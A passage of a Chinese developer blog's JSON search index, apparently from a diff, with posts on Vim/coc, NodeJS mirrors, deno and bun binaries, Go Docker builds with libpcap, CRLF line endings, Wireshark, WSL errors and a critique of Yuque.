JavaScript 如有不正确的地方,欢迎指正。\n","permalink":"https://wdd.js.org/posts/2018/01/substr-and-substring-history/","summary":"引子: 很多时候,当我要字符串截取时,我会想到substr和substring的方法,但是具体要怎么传参数时,我总是记不住。哪个应该传个字符串长度,哪个又应该传个开始和结尾的下标,如果我不去查查这两个函数,我始终不敢去使用它们。所以我总是觉得,这个两个方法名起的真是蹩脚。然而事实是这样的吗?\n看来是时候扒一扒这两个方法的历史了。\n1. 基因追本溯源 在编程语言的历史长河中,曾经出现过很多编程语言。然而大浪淘沙,铅华洗尽之后,很多早已折戟沉沙,有些却依旧光彩夺目。那么stubstr与substring的DNA究竟来自何处?\n1950与1960年代\n1954 - FORTRAN 1958 - LISP 1959 - COBOL 1964 - BASIC 1970 - Pascal 1967-1978:确立了基础范式\n1972 - C语言 1975 - Scheme 1978 - SQL (起先只是一种查询语言,扩充之后也具备了程序结构) 1980年代:增强、模块、性能\n1983 - C++ (就像有类别的C) 1988 - Tcl 1990年代:互联网时代\n1991 - Python 1991 - Visual Basic 1993 - Ruby 1995 - Java 1995 - Delphi (Object Pascal) 1995 - JavaScript 1995 - PHP 2009 - Go 2014 - Swift (编程语言) 1.","title":"追本溯源:substr与substring历史漫话"},{"content":"1. 情景再现 以前用nodejs写后端程序时,遇到Promise这个概念,这个东西好呀!不用谢一层一层回调,直接用类似于jQuery的连缀方式。后来遇到bluebird这个库,它就是Promise库中很有名的。我希望可以把Promise用在前端的ajax请求上,但是我不想又引入bluebird。后来发现,jquery本身就具有类似于Promise的东西。于是我就jquery的Promise写一些异步请求。\n2. 不堪回首 看看一看我以前写异步请求的方式\n// 函数定义 function sendRequest(req,successCallback,errorCallback){ $.ajax({ ... ... 
success:function(res){ successCallback(res); }, error:function(res){ errorCallback(res); } }); } // 函数调用,这个函数的匿名函数写的时候很容易出错,而且有时候难以理解 sendRequest(req,function(res){ //请求成功 ... },function(res){ //请求失败 ... }); 3. 面朝大海 下面是我希望的异步调用方式\nsendRequest(req) .done(function(res){ //请求成功 ... }) .fail(function(req){ //请求失败 ... }); 4. 废话少说,放‘码’过来 talk is cheap, show me the code\n// 最底层的发送异步请求,做成Promise的形式 App.addMethod(\u0026#39;_sendRequest\u0026#39;,function(path,method,payload){ var dfd = $.Deferred(); $.ajax({ url:path, type:method || \u0026#34;get\u0026#34;, headers:{ sessionId:session.id || \u0026#39;\u0026#39; }, data:JSON.stringify(payload), dataType:\u0026#34;json\u0026#34;, contentType : \u0026#39;application/json; charset=UTF-8\u0026#39;, success:function(data){ dfd.resolve(data); }, error:function(data){ dfd.reject(data); } }); return dfd.promise(); }); //根据callId查询录音文件,不仅仅是异步请求可以做成Promise形式,任何函数都可以做成Promise形式 App.addMethod(\u0026#39;_getRecordingsByCallId\u0026#39;,function(callId){ var dfd = $.Deferred(), path = \u0026#39;/api/tenantcalls/\u0026#39;+callId+\u0026#39;/recordings\u0026#39;; App._sendRequest(path) .done(function(res){dfd.resolve(res);}) .fail(function(res){dfd.reject(res);}); return dfd.promise(); }); // 获取录音 App.addMethod(\u0026#39;getCallDetailRecordings\u0026#39;,function(callId){ App._getRecordingsByCallId(callId) .done(function(res){ // 获取结果后渲染数据 App.renderRecording(res); }) .fail(function(res){ App.error(res); }); }); 5. 注意事项 jQuery的Promise主要是用了jQquery的$.Derferred()方法,一些老版本的jquery并不支持此方法。 jQuery版本必须大于等于1.5,推荐使用1.11.3 6. 参考文献 jquery官方api文档 jquery维基百科文档 7. 最后 以上文章仅供参考,不包完全正确。欢迎评论,3q。\n","permalink":"https://wdd.js.org/posts/2018/01/jquery-deferred/","summary":"1. 情景再现 以前用nodejs写后端程序时,遇到Promise这个概念,这个东西好呀!不用谢一层一层回调,直接用类似于jQuery的连缀方式。后来遇到bluebird这个库,它就是Promise库中很有名的。我希望可以把Promise用在前端的ajax请求上,但是我不想又引入bluebird。后来发现,jquery本身就具有类似于Promise的东西。于是我就jquery的Promise写一些异步请求。\n2. 
不堪回首 看看一看我以前写异步请求的方式\n// 函数定义 function sendRequest(req,successCallback,errorCallback){ $.ajax({ ... ... success:function(res){ successCallback(res); }, error:function(res){ errorCallback(res); } }); } // 函数调用,这个函数的匿名函数写的时候很容易出错,而且有时候难以理解 sendRequest(req,function(res){ //请求成功 ... },function(res){ //请求失败 ... }); 3. 面朝大海 下面是我希望的异步调用方式\nsendRequest(req) .done(function(res){ //请求成功 ... }) .fail(function(req){ //请求失败 ... }); 4. 废话少说,放‘码’过来 talk is cheap, show me the code\n// 最底层的发送异步请求,做成Promise的形式 App.addMethod(\u0026#39;_sendRequest\u0026#39;,function(path,method,payload){ var dfd = $.Deferred(); $.ajax({ url:path, type:method || \u0026#34;get\u0026#34;, headers:{ sessionId:session.id || \u0026#39;\u0026#39; }, data:JSON.stringify(payload), dataType:\u0026#34;json\u0026#34;, contentType : \u0026#39;application/json; charset=UTF-8\u0026#39;, success:function(data){ dfd.","title":"熟练使用使用jQuery Promise (Deferred)"}] \ No newline at end of file +[{"content":"请注意,VIM的光标现在位于错误弹窗上了。光标只能左右移动,无法上下移动。 我的光标被困在了错误提示框中。\n因为错误提示只有一行,所以无法上下移动。\n一直以来,我并没有把错误提示框也看成一个窗口,所以我可能多次按了ctrl + w w, 然后光标跳转到了错误提示框上。\n正常的错误提示框,当光标不在关键词上时,错误弹窗会自动关闭的。 但是由于我已经进入了错误弹窗里面。 所以除非按窗口切换的快捷键,我会始终困在这个错误窗口中。\n我觉得,VIM实在是太博大精深了。很多概念性的理解不到位,就会遇到很多困难。 这些困难会给人造成极大的挫折感。\n能解决困难,则学到东西。\n否则就只能放弃VIM, 回到VScode的怀抱中。\n但是,我已经习惯了不使用鼠标的快捷编辑方式。\n我只能学会解决并适应VIM, 并且接受VIM的所有挑战。\n","permalink":"https://wdd.js.org/vim/stuck-in-error-msgfloat-window/","summary":"请注意,VIM的光标现在位于错误弹窗上了。光标只能左右移动,无法上下移动。 我的光标被困在了错误提示框中。\n因为错误提示只有一行,所以无法上下移动。\n一直以来,我并没有把错误提示框也看成一个窗口,所以我可能多次按了ctrl + w w, 然后光标跳转到了错误提示框上。\n正常的错误提示框,当光标不在关键词上时,错误弹窗会自动关闭的。 但是由于我已经进入了错误弹窗里面。 所以除非按窗口切换的快捷键,我会始终困在这个错误窗口中。\n我觉得,VIM实在是太博大精深了。很多概念性的理解不到位,就会遇到很多困难。 这些困难会给人造成极大的挫折感。\n能解决困难,则学到东西。\n否则就只能放弃VIM, 回到VScode的怀抱中。\n但是,我已经习惯了不使用鼠标的快捷编辑方式。\n我只能学会解决并适应VIM, 
并且接受VIM的所有挑战。","title":"困在coc错误弹窗中"},{"content":"在VScode中,可以使用右键来跳转到typescript类型对应的定义,但是用vim的gd命令却无法正常跳转。\n因为无法正常跳转的这个问题,我差点放弃了vim。\n然而我想别人应该也遇到类似的问题。\n我的neovim本身使用的是coc插件,然后我就再次去看看官方文档,来确定最终有没有解决这个问题的方案。\n功夫不负有心人。\n我发现官方给的例子中,就包括了跳转相关的配置。\n首先说明一下,我本身就安装了coc-json coc-tsserver这两个插件,所以只需要将如下的配置写入init.vim\n\u0026#34; GoTo code navigation nmap \u0026lt;silent\u0026gt; gd \u0026lt;Plug\u0026gt;(coc-definition) nmap \u0026lt;silent\u0026gt; gy \u0026lt;Plug\u0026gt;(coc-type-definition) nmap \u0026lt;silent\u0026gt; gi \u0026lt;Plug\u0026gt;(coc-implementation) nmap \u0026lt;silent\u0026gt; gr \u0026lt;Plug\u0026gt;(coc-references) 这样的话,在普通模式,按gy这个快捷键,就能跳转到对应的类型定义,包括某个npm包里面的类型定义,非常好用。\n亲测有效。\n","permalink":"https://wdd.js.org/vim/typescript-go-to-definition/","summary":"在VScode中,可以使用右键来跳转到typescript类型对应的定义,但是用vim的gd命令却无法正常跳转。\n因为无法正常跳转的这个问题,我差点放弃了vim。\n然而我想别人应该也遇到类似的问题。\n我的neovim本身使用的是coc插件,然后我就再次去看看官方文档,来确定最终有没有解决这个问题的方案。\n功夫不负有心人。\n我发现官方给的例子中,就包括了跳转相关的配置。\n首先说明一下,我本身就安装了coc-json coc-tsserver这两个插件,所以只需要将如下的配置写入init.vim\n\u0026#34; GoTo code navigation nmap \u0026lt;silent\u0026gt; gd \u0026lt;Plug\u0026gt;(coc-definition) nmap \u0026lt;silent\u0026gt; gy \u0026lt;Plug\u0026gt;(coc-type-definition) nmap \u0026lt;silent\u0026gt; gi \u0026lt;Plug\u0026gt;(coc-implementation) nmap \u0026lt;silent\u0026gt; gr \u0026lt;Plug\u0026gt;(coc-references) 这样的话,在普通模式,按gy这个快捷键,就能跳转到对应的类型定义,包括某个npm包里面的类型定义,非常好用。\n亲测有效。","title":"VIM typescript 跳转到定义"},{"content":"我一般会紧跟着NodeJS官网的最新版,来更新本地的NodeJS版本。\n我的系统是ubuntu 20.04, 我用tj/n这个工具来更新Node。\n但是这一次,这个命令似乎卡住了。\n我排查后发现,是n这个命令在访问https://nodejs.org/dist/index.tab这个地址时,卡住了。\n请求超时,因为默认没有设置超时时长,所以等待了很久才显示超时的报错,表面上看起来就是卡住了。\n首先我用dig命令查了nodejs.org的dns解析,我发现是正常解析的。\n然后我又用curl对nodejs官网做了一个测试,发现也是请求超时。\ncurl -i -m 5 https://nodejs.org curl: (28) Failed to connect to nodejs.org port 443 after 3854 ms: 连接超时 这样问题就清楚了,然后我就想起来npmmirror上应该有nodejs的镜像。 在查看n这个工具的文档时,我也发现,它是支持设置mirror的。\n其中给的例子用的就是淘宝NPM\n就是设置了一个环境变量。然后执行source ~/.zshrc\nexport 
N_NODE_MIRROR=https://npmmirror.com/mirrors/node 但是,我发现在命令行里用echo可以打印N_NODE_MIRROR这个变量的值,但是在安装脚本里,还是无法获取设置的这个mirror。\n我想或许和我在执行sudo n lts时的sudo有关,这个.zshrc在sudo这种管理员模式下是不生效的。普通用户的环境变量也不会继承到sudo执行的环境变量里\n最后,我用sudo -E n lts, 成功地从npmmirror上更新了nodejs的版本。\n关于curl超时的这个问题,我也给n仓库提出了pull request, https://github.com/tj/n/pull/771\n","permalink":"https://wdd.js.org/posts/2023/n-stucked/","summary":"我一般会紧跟着NodeJS官网的最新版,来更新本地的NodeJS版本。\n我的系统是ubuntu 20.04, 我用tj/n这个工具来更新Node。\n但是这一次,这个命令似乎卡住了。\n我排查后发现,是n这个命令在访问https://nodejs.org/dist/index.tab这个地址时,卡住了。\n请求超时,因为默认没有设置超时时长,所以等待了很久才显示超时的报错,表面上看起来就是卡住了。\n首先我用dig命令查了nodejs.org的dns解析,我发现是正常解析的。\n然后我又用curl对nodejs官网做了一个测试,发现也是请求超时。\ncurl -i -m 5 https://nodejs.org curl: (28) Failed to connect to nodejs.org port 443 after 3854 ms: 连接超时 这样问题就清楚了,然后我就想起来npmmirror上应该有nodejs的镜像。 在查看n这个工具的文档时,我也发现,它是支持设置mirror的。\n其中给的例子用的就是淘宝NPM\n就是设置了一个环境变量。然后执行source ~/.zshrc\nexport N_NODE_MIRROR=https://npmmirror.com/mirrors/node 但是,我发现在命令行里用echo可以打印N_NODE_MIRROR这个变量的值,但是在安装脚本里,还是无法获取设置的这个mirror。\n我想或许和我在执行sudo n lts时的sudo有关,这个.zshrc在sudo这种管理员模式下是不生效的。普通用户的环境变量也不会继承到sudo执行的环境变量里\n最后,我用sudo -E n lts, 成功地从npmmirror上更新了nodejs的版本。\n关于curl超时的这个问题,我也给n仓库提出了pull request, https://github.com/tj/n/pull/771","title":"安装NodeJS, N命令似乎卡住了"},{"content":"很早以前,要运行js,则必须安装nodejs,且没什么办法可以把js直接构建成一个可执行的文件。\n后来出现一个pkg的npm包,可以用来将js打包成可执行的文件。\n我好像用过这个包,但是似乎中间出过一些问题。\n现在是2023年,前端有了新的气象。\n除了nodejs外,还有其他的后起之秀,如deno, 还有最近爆火的bun\n另外nodejs本身也开始支持打包独立二进制文件了,但是需要最新的20.x版本,而且我看了它的使用介绍文档,single-executable-applications, 看起来有点复杂,光一个构建就写了七八步。\n所以今天只比较一下deno和bun构建出的文件大小。\n准备的js文件内容\n// app.js console.log(\u0026#34;hello world\u0026#34;) deno构建指令: deno compile --output h1 app.js, 构建产物为h1 bun构建指令: bun build ./app.js --compile --outfile h2, 构建产物为h2\n-rw-r--r--@ 1 wangduanduan staff 26B Jun 1 13:34 app.js -rwxrwxrwx@ 1 wangduanduan staff 78M Jun 1 13:59 h1 -rwxrwxrwx@ 1 wangduanduan staff 45M Jun 1 14:01 h2 源代码为26字节\ndeno构建相比于源码的倍数: 3152838 bun构建相比于源码的倍数: 1804415 deno构建的可执行文件是bun的1.7倍 参考 
https://bun.sh/docs/bundler/executables https://deno.com/manual@v1.34.1/tools/compiler https://nodejs.org/api/single-executable-applications.html ","permalink":"https://wdd.js.org/posts/2023/js-runtime-build-executable/","summary":"很早以前,要运行js,则必须安装nodejs,且没什么办法可以把js直接构建成一个可执行的文件。\n后来出现一个pkg的npm包,可以用来将js打包成可执行的文件。\n我好像用过这个包,但是似乎中间出过一些问题。\n现在是2023年,前端有了新的气象。\n除了nodejs外,还有其他的后起之秀,如deno, 还有最近爆火的bun\n另外nodejs本身也开始支持打包独立二进制文件了,但是需要最新的20.x版本,而且我看了它的使用介绍文档,single-executable-applications, 看起来有点复杂,光一个构建就写了七八步。\n所以今天只比较一下deno和bun构建出的文件大小。\n准备的js文件内容\n// app.js console.log(\u0026#34;hello world\u0026#34;) deno构建指令: deno compile --output h1 app.js, 构建产物为h1 bun构建指令: bun build ./app.js --compile --outfile h2, 构建产物为h2\n-rw-r--r--@ 1 wangduanduan staff 26B Jun 1 13:34 app.js -rwxrwxrwx@ 1 wangduanduan staff 78M Jun 1 13:59 h1 -rwxrwxrwx@ 1 wangduanduan staff 45M Jun 1 14:01 h2 源代码为26字节\ndeno构建相比于源码的倍数: 3152838 bun构建相比于源码的倍数: 1804415 deno构建的可执行文件是bun的1.7倍 参考 https://bun.sh/docs/bundler/executables https://deno.com/manual@v1.34.1/tools/compiler https://nodejs.org/api/single-executable-applications.html ","title":"JS运行时构建独立二进制程序比较"},{"content":"常规构建 一般情况下,我们的Dockerfile可能是下面这样的\n这个Dockerfile使用了多步构建,使用golang:1.19.4作为构建容器,二进制文件构建成功后,单独把文件复制到alpine镜像。 这样做的好处是最后产出的镜像非常小,一般只有十几MB的样子,如果直接使用golang的镜像来构建,镜像体积就可能达到1G左右。 FROM golang:1.19.4 as builder ENV GO111MODULE=on GOPROXY=https://goproxy.cn,direct WORKDIR /app COPY . . RUN CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -o run . FROM alpine:3.14.2 WORKDIR /app COPY encdec run.sh /app/ COPY --from=builder /app/run . 
EXPOSE 3000 ENTRYPOINT [\u0026#34;/app/run\u0026#34;] 依赖libpcap的构建 如果使用了程序使用了libpcap 来抓包,那么除了我们自己代码产生的二进制文件外,可能还会依赖libpcap的文件。常规打包就会报各种错误,例如文件找不到,缺少so文件等等。\nlibpcap是一个c库,并不是golang的代码,所以处理起来要不一样。\n下面直接给出Dockerfile\n# 构建的基础镜像换成了alpine镜像 FROM golang:alpine as builder # 将alpine镜像换清华源,这样后续依赖的安装会加快 RUN sed -i \u0026#39;s/dl-cdn.alpinelinux.org/mirrors.tuna.tsinghua.edu.cn/g\u0026#39; /etc/apk/repositories # 安装需要用到的C库,和构建依赖 RUN apk --update add linux-headers musl-dev gcc libpcap-dev # 使用国内的goproxy ENV GO111MODULE=on GOPROXY=https://goproxy.cn,direct # 设置工作目录 WORKDIR /app # 拷贝go相关的依赖 COPY go.mod go.sum ./ # 下载go相关的依赖 RUN go mod download # 复制go代码 COPY . . # 编译go代码 RUN CGO_ENABLED=1 GOOS=linux GOARCH=amd64 go build -a --ldflags \u0026#39;-linkmode external -extldflags \u0026#34;-static -s -w\u0026#34;\u0026#39; -o run main.go # 使用最小的scratch镜像 FROM scratch # 设置工作目录 WORKDIR /app # 拷贝二进制文件 COPY --from=builder /app/run . EXPOSE 8086 ENTRYPOINT [\u0026#34;/app/run\u0026#34;] 整个Dockerfile比较好理解,重要的部分就是ldflags的参数了,下面着重讲解一下\n--ldflags \u0026#39;-linkmode external -extldflags \u0026#34;-static -s -w\u0026#34;\u0026#39; 这个 go build 命令包含以下参数:\n-a:强制重新编译所有的包,即使它们已经是最新的。这个选项通常用于强制更新依赖包或者重建整个程序。 --ldflags:设置链接器选项,这个选项后面的参数会被传递给链接器。 -linkmode external:指定链接模式为 external,即使用外部链接器。 -extldflags \u0026quot;-static -s -w\u0026quot;:传递给外部链接器的选项,其中包含了 -static(强制使用静态链接)、-s(禁止符号表和调试信息生成)和 -w(禁止 DWARF 调试信息生成)三个选项。 这个命令的目的是生成一个静态链接的可执行文件,其中所有的依赖包都被链接进了最终的二进制文件中,这样可以保证可执行文件的可移植性和兼容性,同时也可以减小文件大小。这个命令的缺点是编译时间较长,特别是在包数量较多的情况下,因为它需要重新编译所有的包,即使它们已经是最新的。\n","permalink":"https://wdd.js.org/golang/build-docker-image-with-libpcap/","summary":"常规构建 一般情况下,我们的Dockerfile可能是下面这样的\n这个Dockerfile使用了多步构建,使用golang:1.19.4作为构建容器,二进制文件构建成功后,单独把文件复制到alpine镜像。 这样做的好处是最后产出的镜像非常小,一般只有十几MB的样子,如果直接使用golang的镜像来构建,镜像体积就可能达到1G左右。 FROM golang:1.19.4 as builder ENV GO111MODULE=on GOPROXY=https://goproxy.cn,direct WORKDIR /app COPY . . RUN CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -o run . 
FROM alpine:3.14.2 WORKDIR /app COPY encdec run.sh /app/ COPY --from=builder /app/run . EXPOSE 3000 ENTRYPOINT [\u0026#34;/app/run\u0026#34;] 依赖libpcap的构建 如果使用了程序使用了libpcap 来抓包,那么除了我们自己代码产生的二进制文件外,可能还会依赖libpcap的文件。常规打包就会报各种错误,例如文件找不到,缺少so文件等等。\nlibpcap是一个c库,并不是golang的代码,所以处理起来要不一样。\n下面直接给出Dockerfile\n# 构建的基础镜像换成了alpine镜像 FROM golang:alpine as builder # 将alpine镜像换清华源,这样后续依赖的安装会加快 RUN sed -i \u0026#39;s/dl-cdn.alpinelinux.org/mirrors.tuna.tsinghua.edu.cn/g\u0026#39; /etc/apk/repositories # 安装需要用到的C库,和构建依赖 RUN apk --update add linux-headers musl-dev gcc libpcap-dev # 使用国内的goproxy ENV GO111MODULE=on GOPROXY=https://goproxy.","title":"Build Docker Image With Libpcap"},{"content":"默认情况下VScode的tab栏,当前的颜色会更深一点。如下图所示,第三个就是激活的。\n但是实际上并没有太高的区分度,特别是当显示屏有点反光的时候。\n我想应该不止一个人有这个问题吧\n看了github上,有个人反馈了这个问题,https://github.com/Microsoft/vscode/issues/24586\n后面有人回复了\n\u0026#34;workbench.colorCustomizations\u0026#34;: { \u0026#34;tab.activeBorder\u0026#34;: \u0026#34;#ff0000\u0026#34;, \u0026#34;tab.unfocusedActiveBorder\u0026#34;: \u0026#34;#000000\u0026#34; } 上面就是用来配置Tab边界的颜色的。\n看下效果,当前激活的Tab下有明显的红线,是不是更容易区分了呢\n","permalink":"https://wdd.js.org/posts/2023/vscode-highlight-tab/","summary":"默认情况下VScode的tab栏,当前的颜色会更深一点。如下图所示,第三个就是激活的。\n但是实际上并没有太高的区分度,特别是当显示屏有点反光的时候。\n我想应该不止一个人有这个问题吧\n看了github上,有个人反馈了这个问题,https://github.com/Microsoft/vscode/issues/24586\n后面有人回复了\n\u0026#34;workbench.colorCustomizations\u0026#34;: { \u0026#34;tab.activeBorder\u0026#34;: \u0026#34;#ff0000\u0026#34;, \u0026#34;tab.unfocusedActiveBorder\u0026#34;: \u0026#34;#000000\u0026#34; } 上面就是用来配置Tab边界的颜色的。\n看下效果,当前激活的Tab下有明显的红线,是不是更容易区分了呢","title":"VScode激活Tab更容易区分"},{"content":"CRLF 二进制 十进制 十六进制 八进制 字符/缩写 解释 00001010 10 0A 012 LF/NL(Line Feed/New Line) 换行键 00001101 13 0D 085 CR (Carriage Return) 回车键 CR代表回车符,LF代表换行符。\n这两个符号本身都是不可见的。\n如果打印出来\nCR 会显示 \\r LF 会显示 \\n 不同系统的行结束符 Linux系统和Mac换行符是 \\n Windows系统的换行符是 \\r\\n 如何区分文件的换行符? 
可以使用od命令\nod -bc index.md 假如文件的原始内容如下\n- 1 - 2 注意012是八进制的数,十进制对应的数字是10,也就是换行符。\n0000000 055 040 061 012 055 040 062 - 1 \\n - 2 0000007 如果用vscode打开文件,也能看到对应的文件格式,如LF。\n换行符的的差异会导致哪些问题? shell脚本问题 如果bash脚本里包含CRLF, 可能导致脚本无法解析等各种异常问题。\n例如下面的报错,docker启动shell脚本可能是在windows下编写的。所以脚本无法\nstandard_init_linux.go:211: exec user process caused \u0026#34;no such file or directory\u0026#34; 如何把windows文件类型转为unix? # 可以把windows文件类型转为unix dos2unix file 如果是vscode,也可以点击对应的文件格式按钮。\n如何解决这些问题? 最好的方案,是我们把代码编辑器, 设置eol为\\n, 从源头解决这个问题。\n以vscode为例子:\nTip vscode的eol配置,只对新文件生效 如果文件本来就是CRLF, 需要先转成LF, eol才会生效 ","permalink":"https://wdd.js.org/posts/2023/tips-about-cr-lf/","summary":"CRLF 二进制 十进制 十六进制 八进制 字符/缩写 解释 00001010 10 0A 012 LF/NL(Line Feed/New Line) 换行键 00001101 13 0D 085 CR (Carriage Return) 回车键 CR代表回车符,LF代表换行符。\n这两个符号本身都是不可见的。\n如果打印出来\nCR 会显示 \\r LF 会显示 \\n 不同系统的行结束符 Linux系统和Mac换行符是 \\n Windows系统的换行符是 \\r\\n 如何区分文件的换行符? 可以使用od命令\nod -bc index.md 假如文件的原始内容如下\n- 1 - 2 注意012是八进制的数,十进制对应的数字是10,也就是换行符。\n0000000 055 040 061 012 055 040 062 - 1 \\n - 2 0000007 如果用vscode打开文件,也能看到对应的文件格式,如LF。\n换行符的的差异会导致哪些问题? 
shell脚本问题 如果bash脚本里包含CRLF, 可能导致脚本无法解析等各种异常问题。\n例如下面的报错,docker启动shell脚本可能是在windows下编写的。所以脚本无法\nstandard_init_linux.go:211: exec user process caused \u0026#34;no such file or directory\u0026#34; 如何把windows文件类型转为unix?","title":"行尾结束符引起的问题"},{"content":"硬件 内存:金士顿 16*2;869元 固态硬盘: 三星980 1TB; 799元 主机:NUC11 PAHI7; 4核心八线程;3399元 累计5000多一点, 是最新版Macbook pro M1prod的三分之一\n启动盘制作 ventoy:试了几次,无法开机,遂放弃 rufus:能够正常使用;注意分区类型要选择GPT。最新款的一些电脑都是支持uefi的,所以选择GPT分区,一定没问题。\nU盘启动 开机后按F2, 里面有一个是设置BIOS优先级,可以设置优先U盘启动\n磁盘分区 因为之前设置了默认的整个磁盘分区,根目录只有15G, 太小了,所以我选择手动分区 先设置一个efi分区,就用默认的300M就可以,默认弹窗出来,是不需要设置挂载目录的 设置根分区 /, 我分了300G 设置/home分区,剩下的磁盘都分给它 我没有设置swap分区,因为我觉得32G内存够大,不需要swap\n其他 后续的配置非常简单,基本点点按钮就能搞定\n体验 总体来说,安装软件是最舒服的一件事。不需要像安装manjaro那样,到处找安装常用应用的教程。只需要打开应用商店,点击下载就可以了。 整个安装过程,我觉得磁盘分区是最难的部分。其他都是非常方便的。 感觉深度的界面很漂亮,值得体验\n问题 NUC自带的麦克风无法外放声音,插有线耳机也不行,只有蓝牙耳机能用 ","permalink":"https://wdd.js.org/posts/2022/12/nuc11-deepin-20-2/","summary":"硬件 内存:金士顿 16*2;869元 固态硬盘: 三星980 1TB; 799元 主机:NUC11 PAHI7; 4核心八线程;3399元 累计5000多一点, 是最新版Macbook pro M1prod的三分之一\n启动盘制作 ventoy:试了几次,无法开机,遂放弃 rufus:能够正常使用;注意分区类型要选择GPT。最新款的一些电脑都是支持uefi的,所以选择GPT分区,一定没问题。\nU盘启动 开机后按F2, 里面有一个是设置BIOS优先级,可以设置优先U盘启动\n磁盘分区 因为之前设置了默认的整个磁盘分区,根目录只有15G, 太小了,所以我选择手动分区 先设置一个efi分区,就用默认的300M就可以,默认弹窗出来,是不需要设置挂载目录的 设置根分区 /, 我分了300G 设置/home分区,剩下的磁盘都分给它 我没有设置swap分区,因为我觉得32G内存够大,不需要swap\n其他 后续的配置非常简单,基本点点按钮就能搞定\n体验 总体来说,安装软件是最舒服的一件事。不需要像安装manjaro那样,到处找安装常用应用的教程。只需要打开应用商店,点击下载就可以了。 整个安装过程,我觉得磁盘分区是最难的部分。其他都是非常方便的。 感觉深度的界面很漂亮,值得体验\n问题 NUC自带的麦克风无法外放声音,插有线耳机也不行,只有蓝牙耳机能用 ","title":"NUC11 安装 Deepin 20.2.4"},{"content":"0. 前提条件 wireshark 4.0.2 1. 时间显示 wireshark的默认时间显示是抓包的相对时间, 如果我们想让时间按照年月日时分秒显示,就需要进行如下设置:\n视图-\u0026gt;时间显示格式-\u0026gt;选择具体的时间格式\n2. UDP解码为RTP 方案1 在一个UDP包上点击右键,出现如下弹框,选择Decode As\n在当前值上选择RTP 方案2 方案1有一个缺点,只能过滤单一端口的UDP包,将其解码为RTP。\n假如有很多的UDP包,并且端口都不一样,如果想把这些包都解码为RTP, 则需要如下设置。\n选择分析-\u0026gt;启用的协议\n在搜索框中输入RTP, 然后启用RTP的rtp_udp\n","permalink":"https://wdd.js.org/posts/2022/12/wireshark-101/","summary":"0. 前提条件 wireshark 4.0.2 1. 
时间显示 wireshark的默认时间显示是抓包的相对时间, 如果我们想让时间按照年月日时分秒显示,就需要进行如下设置:\n视图-\u0026gt;时间显示格式-\u0026gt;选择具体的时间格式\n2. UDP解码为RTP 方案1 在一个UDP包上点击右键,出现如下弹框,选择Decode As\n在当前值上选择RTP 方案2 方案1有一个缺点,只能过滤单一端口的UDP包,将其解码为RTP。\n假如有很多的UDP包,并且端口都不一样,如果想把这些包都解码为RTP, 则需要如下设置。\n选择分析-\u0026gt;启用的协议\n在搜索框中输入RTP, 然后启用RTP的rtp_udp","title":"Wireshark 使用技巧"},{"content":"最近我更新了Windows, 之后我的Windows Linux子系统Ubuntu打开就报错了\n报错截图如下:\n在网上搜了一遍之后,很多教程都是说要打开Windows的子系统的功能。 但是由于我已经使用Linux子系统很长时间了,我觉得应该和这个设置无关。\n而且我检查了一下,我的这个设置本来就是打开的。\n然后我在Powershell里输入 wsl, 这个命令都直接报错了。\nPS C:\\WINDOWS\\system32\u0026gt; wsl --install 没有注册类 Error code: Wsl/0x80040154 然后我到wsl的github上搜索类似的问题,查到有很多类似的描述,都是升级之后遇到的问题,我试了好几个方式,都没用。\n但是最后这个有用了!\nhttps://github.com/microsoft/WSL/issues/9064\n解决的方案就是:\n卸载已经安装过的Windows SubSystem For Linux Preview 然后在Windows应用商店重新安装这个应用 Windows升级之后,可能Windows Linux子系统组件也更新了某些内容。\n所以需要重装。\n这里不得不吐槽一下WSL, 这个工具仅仅是个玩具。随着windows更新,这个工具随时都会崩溃,最好不要太依赖它。\n","permalink":"https://wdd.js.org/posts/2022/12/wsl-error-0x80040154-after-windows-update/","summary":"最近我更新了Windows, 之后我的Windows Linux子系统Ubuntu打开就报错了\n报错截图如下:\n在网上搜了一遍之后,很多教程都是说要打开Windows的子系统的功能。 但是由于我已经使用Linux子系统很长时间了,我觉得应该和这个设置无关。\n而且我检查了一下,我的这个设置本来就是打开的。\n然后我在Powershell里输入 wsl, 这个命令都直接报错了。\nPS C:\\WINDOWS\\system32\u0026gt; wsl --install 没有注册类 Error code: Wsl/0x80040154 然后我到wsl的github上搜索类似的问题,查到有很多类似的描述,都是升级之后遇到的问题,我试了好几个方式,都没用。\n但是最后这个有用了!\nhttps://github.com/microsoft/WSL/issues/9064\n解决的方案就是:\n卸载已经安装过的Windows SubSystem For Linux Preview 然后在Windows应用商店重新安装这个应用 Windows升级之后,可能Windows Linux子系统组件也更新了某些内容。\n所以需要重装。\n这里不得不吐槽一下WSL, 这个工具仅仅是个玩具。随着windows更新,这个工具随时都会崩溃,最好不要太依赖它。","title":"Windows更新之后 Linux报错 Error 0x80040154"},{"content":"在设置里搜索双击,如果有使用双击关闭浏览器选项卡, 则开启。\n对于用鼠标关闭标签页来说,的确可以提高极大的效率。\n","permalink":"https://wdd.js.org/posts/2022/12/double-click-close-tab/","summary":"在设置里搜索双击,如果有使用双击关闭浏览器选项卡, 则开启。\n对于用鼠标关闭标签页来说,的确可以提高极大的效率。","title":"Edge浏览器双击标签栏 
关闭标签页"},{"content":"我在2019年的六月份时候,开始使用语雀。\n一路走来,我见证了语雀的功能越来越多,但是于此同时,我也越来越讨厌语雀。\n2022年12月初,我基本上把语雀上的所有内容都迁移到我的hugo博客上。\n我的博客很乱,也很多。我写了一个脚本,一个一个知识库的搬迁,总体速度还算快,唯一不便的就是图片需要一个一个复制粘贴。\n有些图片是用语雀的绘图语言例如plantuml编写的,就只能截图保存了。\n总之,我也是蛮累的。\n简单列一下我不喜欢语雀的几个原因:\n性能差,首页渲染慢,常常要等很久,首页才能打开 产品定位混乱,随意更改用户数据 我记得有时候我把知识库升级成了空间,过了一段时间,不知道为什么空间由变成了知识库。 数字花园这个概念真的很烂。我好好的个人主页,某一天打开,大变样,换了个名字,叫做数字花园。甚至没有给用户一个选择保留老版本的个人主页的权利。太不尊重用户了!! 就好像你下班回家,看见房门被人撬开,你打开房门,看见有人在你的客厅种满大蒜,然后还兴高采烈的告诉你,看,这是您的数字菜园!多好,以后不用买蒜了。 会员的流量计费规则, 或许现在的计费规则已经变了,我也没有再充会员,但是再以前。即使是会员,也是按流量计费的。什么叫按流量计费,假如你的一篇博客里上传了一张1mb的图片,即使你后来把这个图片删了,这1mb的流量还是会存在。而且流量是一直往上涨的,还不像运营商,每月一号给你清零一次的机会。 